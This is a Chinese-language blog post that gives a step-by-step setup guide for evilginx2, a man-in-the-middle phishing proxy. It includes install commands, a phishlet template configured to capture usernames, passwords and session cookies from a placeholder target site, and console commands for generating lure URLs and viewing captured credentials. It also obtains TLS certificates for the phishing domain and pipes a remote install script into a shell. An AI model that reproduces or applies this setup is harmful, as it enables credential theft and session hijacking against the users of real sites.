evilginx2:一款作为中间人的网络钓鱼框架

0X01 - 安装evilginx2

直接用已经编译好的sh直接执行

下载链接:https://github.com/kgretzky/evilginx2/releases

选择你需要的版本

这里我选了第一个linux x86版本

/root目录下

1 mkdir evilginx
2 cd evilginx
3 unzip  evilginx_linux_x86_2.3.0.zip
4 chmod +x install.sh
5 ./install.sh

安装完成直接输入evilginx即可

0X02 - 配置evilginx2的钓鱼模板

用-p参数加载模板位置文件夹

1 evilginx -p /root/evilginx/phishlets/     #非必要步骤,可在默认路径找到phishlets

默认模板在phishlets文件夹下,在默认模板进行复制编辑,模板参考如下:

假设真实网站https://www.abc.com/asdf,我们的钓鱼域名是abcd.com ,钓鱼模板配置参考如下:

 1 author: '@qwer'
 2 min_ver: '2.3.0'
 3 proxy_hosts:
 4   - {phish_sub: 'www', orig_sub: 'www', domain: 'abc.com', session: true, is_landing: true}
 5 sub_filters: 
 6   - { triggers_on: 'www.abc.com',orig_sub: 'www',    domain: 'www.abc.com',search: 'https://{hostname}/asdf',replace: 'https://{hostname}/asdf',mimes: ['text/html', 'application/json']}
 7 auth_tokens:
 8   - domain: '.abc.com'
 9     keys: ['client-request-id','username','wctx','.*,regexp']       #burpsuit抓包查看cookie参数和其他post参数填入分号里面,'.*,regexp'勿改动
10 credentials:
11   username:
12     key: 'UserName'  #按实际修改
13     search: '(.*)'
14     type: 'post'
15   password:
16     key: 'Password'  #按实际修改
17     search: '(.*)'
18     type: 'post'
19 login:
20   domain: 'www.abc.com'
21   path: 'asdf,'

 

0X03 - 启动evilginx2

输入evilginx,框架启动,使用命令如下:

 1 config domain xx.xx                           #配置域名
 2 config ip xx.xx.xx.xx                         #配置ip为搭建evilginx2的ip
 3 phishlets hostname (模板名称)(对应自己的域名)
 4 phishlets enable (模板名称)                   #启动模板),此处需要生成证书,可先敲该命令,然后按提示操作,进行证书生成,详细见0X04
 5 lures create (模板名称)                       #创建模板实例
 6 lures get-url ID                                #获取生成的URL  
 7 lures edit path xxx ID xx                     #编辑url后缀部分
 8 lures edit redirect_url   xxx ID xx           #设置重定向 url
 9 sessions                                      #查看捕获的账号密码
10 sessions delete ID                            #删除某行数据
11 lures delete ID                                                                      #删除生成的url 

 

0X04 - 证书生成

acme.sh 实现了 acme 协议, 可以从 let‘s encrypt 生成免费的证书,详细参见https://www.cnblogs.com/clsn/p/10040334.html

这里下载安装acme.sh,执行以下步骤1-4即可安装完成

1 curl  https://get.acme.sh | sh
2 alias acme.sh=~/.acme.sh/acme.sh
3 echo 'alias acme.sh=~/.acme.sh/acme.sh' >>/etc/profile
4 00 00 * * * root /root/.acme.sh/acme.sh --cron --home /root/.acme.sh &>/var/log/acme.sh.logs
5 acme.sh --issue  -d *.clsn.io -d clsn.io --dns --yes-I-know-dns-manual-mode-enough-go-ahead-please --force  #修改clsn.io为自己实际域名

 

将生成的TXT value 加入自己的域名管理平台DNS Management

加入后执行以下命令:

 

1 acme.sh --renew  -d *.clsn.io -d clsn.io --dns --yes-I-know-dns-manual-mode-enough-go-ahead-please --force  #修改clsn.io为自己实际域名

此时证书已生成,存放在/root/.acme.sh下。

因为evilginx2用的证书格式是crt的,但此处生成的是cer模式,所以需要我们用openssl将cer转成crt格式。

在自己的电脑下载openssl,进行证书格式的转换。Openssl下载:http://www.chinassl.net/upload/software/win32openssl-0_9_8.rar

1 openssl.exe x509 -inform PEM -in certificate.cer -out certificate.crt    #cer若不在openssl的目录下,需要绝对路径,此处可以用拉取方式

将生成的crt证书和key放到所需证书的文件夹下,文件夹为/root/.evilginx/crt/你的域名(在搭建evilginx2服务器上启动evilginx,执行phishlets enable (模板名称),报错里有显示该位置),并将crt和key的名称修改为你的模板名称,此时执行phishlets enable (模板名称)即可显示成功。

 0X05 - 可能遇到的问题

1、如果是多级子域名,可能证书会失效,浏览器访问会显示“不安全”。

2、证书可能生成失败,执行以下命令查看解析是否生效

 

1 dig -t txt  _acme-challenge.clsn.io @8.8.8.8           #这里把clsn.io更换为自己的域名

 

3、证书可能生成失败,有可能是域名本身问题,使用nslookup查看是否解析到该域名,即使解析到该域名,可能存在某个前缀就是无法生出证书,换另外一个前缀试试,经多次尝试,遇到此情况将前缀换成"b"就可以,但可能域名与实际使用不太契合,根据实际需求酌情考虑。

 

posted @ 2020-09-01 16:58  Persimmon~  阅读(2373)  评论(0)    收藏  举报